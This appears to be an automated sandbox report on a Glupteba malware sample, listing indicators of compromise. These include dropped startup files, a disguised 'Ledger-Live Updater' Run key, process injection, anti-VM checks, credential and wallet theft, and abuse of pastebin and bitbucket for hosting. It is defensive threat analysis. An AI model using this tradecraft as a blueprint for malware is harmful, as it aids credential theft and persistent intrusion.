glupteba | da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	DGDAEHCBGI.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	UNAhnkHQ34vsYuu3ggHNYRmg.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	u2ls.0.exe

Drops startup file 12 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mdgLP7dY9njhwe08toZPvGZN.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9ETvjpraw8qwcdeQaEpPMDlU.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bnv2nyl0xlEeFO3b6uR39eyN.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3VXkvJwIdAPjetmC2XdlkJyO.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\njFDBkzCkeS525acBCLOeMuR.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UP4QQFUbNX1Xenno6Ibix4q4.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8qFNTxWtWcrcVXqj7K3d3TZJ.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DH0Jyhgh5qUGtVzYHkvgx1DW.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uBH8iCa6TuR3JuM9ZmGWKDz4.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6IuzPIT6F0RH8vBuS7B3oGmx.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QqNmKjWP7mCB0vtS9GBhwVWX.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZE6c79ISk0BoLB9GkY7cC16F.bat	jsc.exe

Executes dropped EXE 32 IoCs

pid	Process
3376	UNAhnkHQ34vsYuu3ggHNYRmg.exe
4948	BOValDiVDjiQWzr6UN6p6jA7.exe
436	BOValDiVDjiQWzr6UN6p6jA7.tmp
428	wZuArslZHWkceXKudkk2iDCR.exe
1124	zFFFw4OHExPBcLGvnue2mRJZ.exe
3308	xCnC3kRGjYzKzgztZzTB60s2.exe
4336	djedit.exe
3664	L7msUYWEb0w2cAnBCZdJMuLo.exe
2608	djedit.exe
3636	wiv9T1pqAf4f2oHhfWycBzc5.exe
4724	u2ls.0.exe
4020	wfplwfs.exe
2604	P3JBDfWsxH7gfXrVpC5Da95h.exe
5084	u2ls.1.exe
2368	syncUpd.exe
2472	JVj1qEtdxsUSRfq6lUYWP1us.exe
212	JVj1qEtdxsUSRfq6lUYWP1us.exe
5216	BroomSetup.exe
5256	JVj1qEtdxsUSRfq6lUYWP1us.exe
5440	JVj1qEtdxsUSRfq6lUYWP1us.exe
5544	JVj1qEtdxsUSRfq6lUYWP1us.exe
6016	xCnC3kRGjYzKzgztZzTB60s2.exe
6032	zFFFw4OHExPBcLGvnue2mRJZ.exe
6040	L7msUYWEb0w2cAnBCZdJMuLo.exe
5336	vedpmmRXAXSZuq7UqKOIe4r1.exe
4484	Install.exe
3504	ePj0Q3IAwol0xi3TP0p4YL3U.exe
5408	Install.exe
6100	Install.exe
1304	Install.exe
6072	wZuArslZHWkceXKudkk2iDCR.exe
1540	DGDAEHCBGI.exe

Loads dropped DLL 10 IoCs

pid	Process
436	BOValDiVDjiQWzr6UN6p6jA7.tmp
2604	P3JBDfWsxH7gfXrVpC5Da95h.exe
2604	P3JBDfWsxH7gfXrVpC5Da95h.exe
2472	JVj1qEtdxsUSRfq6lUYWP1us.exe
212	JVj1qEtdxsUSRfq6lUYWP1us.exe
4724	u2ls.0.exe
4724	u2ls.0.exe
5256	JVj1qEtdxsUSRfq6lUYWP1us.exe
5440	JVj1qEtdxsUSRfq6lUYWP1us.exe
5544	JVj1qEtdxsUSRfq6lUYWP1us.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 16 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0008000000023266-193.dat	upx
behavioral2/files/0x0008000000023266-208.dat	upx
behavioral2/files/0x0008000000023266-207.dat	upx
behavioral2/memory/5084-257-0x0000000000400000-0x0000000000930000-memory.dmp	upx
behavioral2/memory/5084-300-0x0000000000400000-0x0000000000930000-memory.dmp	upx
behavioral2/files/0x0009000000023280-311.dat	upx
behavioral2/memory/2472-328-0x0000000000C30000-0x0000000001168000-memory.dmp	upx
behavioral2/memory/212-329-0x0000000000C30000-0x0000000001168000-memory.dmp	upx
behavioral2/files/0x000700000002328c-368.dat	upx
behavioral2/memory/5256-378-0x00000000002F0000-0x0000000000828000-memory.dmp	upx
behavioral2/files/0x0007000000023295-373.dat	upx
behavioral2/files/0x0009000000023280-384.dat	upx
behavioral2/files/0x0009000000023280-388.dat	upx
behavioral2/memory/5440-434-0x0000000000C30000-0x0000000001168000-memory.dmp	upx
behavioral2/memory/5216-432-0x0000000000400000-0x0000000000930000-memory.dmp	upx
behavioral2/memory/5216-443-0x0000000000400000-0x0000000000930000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ledger-Live Updater = "C:\\Users\\Admin\\AppData\\Local\\Temp\\DGDAEHCBGI.exe"	DGDAEHCBGI.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 4 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\D:	JVj1qEtdxsUSRfq6lUYWP1us.exe
File opened (read-only)	\??\F:	JVj1qEtdxsUSRfq6lUYWP1us.exe
File opened (read-only)	\??\D:	JVj1qEtdxsUSRfq6lUYWP1us.exe
File opened (read-only)	\??\F:	JVj1qEtdxsUSRfq6lUYWP1us.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
28	pastebin.com
38	bitbucket.org
49	bitbucket.org
25	pastebin.com

Drops file in System32 directory 6 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 2128 set thread context of 2068	2128	da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe	92
PID 4020 set thread context of 5076	4020	wfplwfs.exe	122
PID 4020 set thread context of 5004	4020	wfplwfs.exe	185
PID 4020 set thread context of 2084	4020	wfplwfs.exe	165
PID 4020 set thread context of 5220	4020	wfplwfs.exe	200
PID 4020 set thread context of 4452	4020	wfplwfs.exe	212

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	L7msUYWEb0w2cAnBCZdJMuLo.exe
File opened (read-only)	\??\VBoxMiniRdrDN	wZuArslZHWkceXKudkk2iDCR.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bkigDFRrkKahyaAEgB.job	schtasks.exe
File created	C:\Windows\Tasks\469e1aba41e3631f.job	wfplwfs.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4860	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 14 IoCs

pid	pid_target	Process	procid_target
1164	3376	WerFault.exe	94
1488	5076	WerFault.exe	122
5280	6032	WerFault.exe	149
5324	6016	WerFault.exe	148
5868	5004	WerFault.exe	156
5672	2084	WerFault.exe	165
5492	5220	WerFault.exe	200
832	4724	WerFault.exe	105
4532	2368	WerFault.exe	117
5212	4452	WerFault.exe	212
3528	3564	WerFault.exe	252
3296	3708	WerFault.exe	259
3324	5148	WerFault.exe	277
4392	5900	WerFault.exe	282

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral2/files/0x0007000000023265-197.dat	nsis_installer_2
behavioral2/files/0x0007000000023265-187.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u2ls.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u2ls.0.exe

Creates scheduled task(s) 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
5732	schtasks.exe
2848	schtasks.exe
836	schtasks.exe
5148	schtasks.exe
5380	schtasks.exe
5176	schtasks.exe
2028	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	L7msUYWEb0w2cAnBCZdJMuLo.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
5460	PING.EXE
2848	PING.EXE

Suspicious behavior: EnumeratesProcesses 50 IoCs

pid	Process
4724	u2ls.0.exe
4724	u2ls.0.exe
2760	powershell.exe
2760	powershell.exe
216	powershell.exe
216	powershell.exe
5180	powershell.exe
5180	powershell.exe
1832	powershell.exe
1832	powershell.exe
3308	xCnC3kRGjYzKzgztZzTB60s2.exe
3308	xCnC3kRGjYzKzgztZzTB60s2.exe
3664	L7msUYWEb0w2cAnBCZdJMuLo.exe
3664	L7msUYWEb0w2cAnBCZdJMuLo.exe
1124	zFFFw4OHExPBcLGvnue2mRJZ.exe
1124	zFFFw4OHExPBcLGvnue2mRJZ.exe
5180	powershell.exe
5928	powershell.exe
5928	powershell.exe
5928	powershell.exe
4724	u2ls.0.exe
4724	u2ls.0.exe
428	wZuArslZHWkceXKudkk2iDCR.exe
428	wZuArslZHWkceXKudkk2iDCR.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
6040	L7msUYWEb0w2cAnBCZdJMuLo.exe
6040	L7msUYWEb0w2cAnBCZdJMuLo.exe
6072	wZuArslZHWkceXKudkk2iDCR.exe
6072	wZuArslZHWkceXKudkk2iDCR.exe
6040	L7msUYWEb0w2cAnBCZdJMuLo.exe
6040	L7msUYWEb0w2cAnBCZdJMuLo.exe
6040	L7msUYWEb0w2cAnBCZdJMuLo.exe
6040	L7msUYWEb0w2cAnBCZdJMuLo.exe
6040	L7msUYWEb0w2cAnBCZdJMuLo.exe
6040	L7msUYWEb0w2cAnBCZdJMuLo.exe
6040	L7msUYWEb0w2cAnBCZdJMuLo.exe
6040	L7msUYWEb0w2cAnBCZdJMuLo.exe
6072	wZuArslZHWkceXKudkk2iDCR.exe
6072	wZuArslZHWkceXKudkk2iDCR.exe
1540	DGDAEHCBGI.exe
1540	DGDAEHCBGI.exe
6072	wZuArslZHWkceXKudkk2iDCR.exe
6072	wZuArslZHWkceXKudkk2iDCR.exe
6072	wZuArslZHWkceXKudkk2iDCR.exe
6072	wZuArslZHWkceXKudkk2iDCR.exe
6072	wZuArslZHWkceXKudkk2iDCR.exe
6072	wZuArslZHWkceXKudkk2iDCR.exe
1540	DGDAEHCBGI.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeDebugPrivilege	2068	jsc.exe
Token: SeDebugPrivilege	2760	powershell.exe
Token: SeDebugPrivilege	216	powershell.exe
Token: SeDebugPrivilege	1832	powershell.exe
Token: SeDebugPrivilege	5180	powershell.exe
Token: SeDebugPrivilege	3664	L7msUYWEb0w2cAnBCZdJMuLo.exe
Token: SeDebugPrivilege	3308	xCnC3kRGjYzKzgztZzTB60s2.exe
Token: SeDebugPrivilege	1124	zFFFw4OHExPBcLGvnue2mRJZ.exe
Token: SeImpersonatePrivilege	3308	xCnC3kRGjYzKzgztZzTB60s2.exe
Token: SeImpersonatePrivilege	3664	L7msUYWEb0w2cAnBCZdJMuLo.exe
Token: SeImpersonatePrivilege	1124	zFFFw4OHExPBcLGvnue2mRJZ.exe
Token: SeDebugPrivilege	5928	powershell.exe
Token: SeDebugPrivilege	428	wZuArslZHWkceXKudkk2iDCR.exe
Token: SeImpersonatePrivilege	428	wZuArslZHWkceXKudkk2iDCR.exe
Token: SeDebugPrivilege	3964	powershell.exe
Token: SeDebugPrivilege	1540	DGDAEHCBGI.exe

Suspicious use of SetWindowsHookEx 17 IoCs

pid	Process
5084	u2ls.1.exe
5076	rundll32.exe
5076	rundll32.exe
5076	rundll32.exe
5216	BroomSetup.exe
5004	rundll32.exe
5004	rundll32.exe
5004	rundll32.exe
2084	rundll32.exe
2084	rundll32.exe
2084	rundll32.exe
5220	rundll32.exe
5220	rundll32.exe
5220	rundll32.exe
4452	rundll32.exe
4452	rundll32.exe
4452	rundll32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2128 wrote to memory of 2016	2128	da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe	89
PID 2128 wrote to memory of 2016	2128	da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe	89
